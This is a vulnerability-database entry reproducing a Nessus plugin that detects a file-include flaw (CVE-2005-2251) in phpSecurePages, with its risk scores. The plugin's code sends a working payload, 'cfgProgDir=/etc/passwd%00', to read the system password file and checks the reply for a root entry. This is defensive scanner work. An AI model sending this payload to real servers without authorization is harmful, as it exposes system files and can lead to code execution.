Lucene search

K
nessusThis script is Copyright (C) 2005-2021 Tenable Network Security, Inc.PHPSECUREPAGES_CFGPROGDIR_FILE_INCLUDES.NASL
HistoryJul 10, 2005 - 12:00 a.m.

phpSecurePages cfgProgDir Variable File Include Vulnerabilities

2005-07-1000:00:00
This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.
www.tenable.com
53

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.657 Medium

EPSS

Percentile

97.9%

The remote host is running phpSecurePages, a PHP module used to secure pages with a login name / password.

The installed version of phpSecurePages allows remote attackers to control the ‘cfgProgDir’ variable used when including PHP code in several of the application’s scripts. By leveraging this flaw, an attacker may be able to view arbitrary files on the remote host and execute arbitrary PHP code, possibly taken from third-party hosts.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description) {
  script_id(18659);
  script_version("1.17");

  script_cve_id("CVE-2005-2251");
  script_bugtraq_id(14201);

  script_name(english:"phpSecurePages cfgProgDir Variable File Include Vulnerabilities");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains several PHP scripts that may allow
arbitrary code execution and local file disclosure." );
 script_set_attribute(attribute:"description", value:
"The remote host is running phpSecurePages, a PHP module used to secure
pages with a login name / password. 

The installed version of phpSecurePages allows remote attackers to
control the 'cfgProgDir' variable used when including PHP code in
several of the application's scripts.  By leveraging this flaw, an
attacker may be able to view arbitrary files on the remote host and
execute arbitrary PHP code, possibly taken from third-party hosts." );
 script_set_attribute(attribute:"see_also", value:"https://secuniaresearch.flexerasoftware.com/advisories/15994/" );
 script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/07/10");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/07/06");
 script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:secure_reality:phpsecurepages");
script_end_attributes();

  script_summary(english:"Checks for cfgProgDir variable file include vulnerabilities in phpSecurePages");
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.");
  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);


# Loop through CGI directories.
foreach dir (cgi_dirs()) {
  # Try to exploit the flaw to read /etc/passwd.
  r = http_send_recv3(method:"GET", port: port,
    item:string(
      dir, "/secure.php?",
      "cfgProgDir=/etc/passwd%00" ));
  if (isnull(r)) exit(0);
  res = r[2];

  # There's a problem if...
  if (
    # there's an entry for root or...
    egrep(string:res, pattern:"root:.*:0:[01]:") ||
    # we get an error saying "failed to open stream".
    #
    # nb: this suggests magic_quotes_gpc was enabled; passing 
    #     remote URLs might still work though.
    egrep(string:res, pattern:"Warning: main\(/etc/passwd.+failed to open stream")
  ) {
    security_hole(port);
    exit(0);
  }
}
VendorProductVersionCPE
secure_realityphpsecurepagescpe:/a:secure_reality:phpsecurepages

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.657 Medium

EPSS

Percentile

97.9%

Related for PHPSECUREPAGES_CFGPROGDIR_FILE_INCLUDES.NASL